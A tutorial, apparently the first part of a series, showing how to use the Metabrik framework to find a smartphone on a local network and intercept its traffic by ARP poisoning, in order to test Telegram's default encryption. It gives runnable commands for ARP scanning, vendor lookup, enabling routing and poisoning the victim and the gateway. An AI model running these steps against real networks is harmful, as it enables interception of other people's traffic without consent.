It is said that, by default, messages sent to a contact through Telegram -a messaging application for smartphones- are not encrypted. You have to enter a specific menu named “New Secret Chat” to enable end-to-end encryption. Let’s verify it is indeed the case by using some Briks.
Try by yourself using the Docker image:
docker pull metabrik/metabrik docker run -it metabrik/metabrik
Let’s load some Briks for the work
We will need to perform a Man-in-The-Middle (MiTM) attack on our local network to allow interception of traffic from a smartphone to Telegram servers or remote peers. The network::arp Brik has such a function. We will also need to become a router, or the traffic will be lost: network::route comes to the rescue. Then we will have to analyse the traffic itself, we will use Briks network::read, network::stream and client::whois to locate Telegram IP addresses. We will also use lookup::oui to find a potential smartphone on the network.
use network::arp use network::route use network::read use network::stream use lookup::oui use client::whois
Also, you have to execute an update Command on the lookup::oui Brik so it fetches the file from IEEE organization.
run lookup::oui update
Performing the MiTM attack
We will use ARP poisoning to perform a standard LAN MiTM attack. But we don’t want to poison everyone, we just want to listen to a smartphone traffic. We will use some ARP scanning technics to gather available neighbors, and we will perform a lookup on the MAC address to retrieve the vendor. This information will directly lead us to a smartphone.
run network::arp scan my $scan = $RUN my $mac = [ keys %{$RUN->{by_mac}} ] run lookup::oui from_hex $mac->[0] run lookup::oui from_hex $mac->[1]
Looks like we have found a Motorola smartphone. Perfect target for us. To gather its IP address, just issue a Command to ask data from a saved variable:
my $victim = $scan->{by_mac}{"5c:51:88:XX:XX:XX"}
Now, we want to intercept traffic between the victim and the Internet. Thus, we will attack the gateway. We have to find its IP address, configure our host as a network router, and we will be ready to perform the ARP poisoning:
my $victim = "192.168.1.20" run network::route default_ipv4_gateway my $gateway = $RUN run network::route enable_router_ipv4 run network::arp full_poison $victim $gateway
Conclusion
We have seen how to scan the local network in search for a specific device and how to launch a Man-in-The-Middle attack. This concludes the first part of this article. You may think it is a little bit short, but you will probably be eager to read the next part 🙂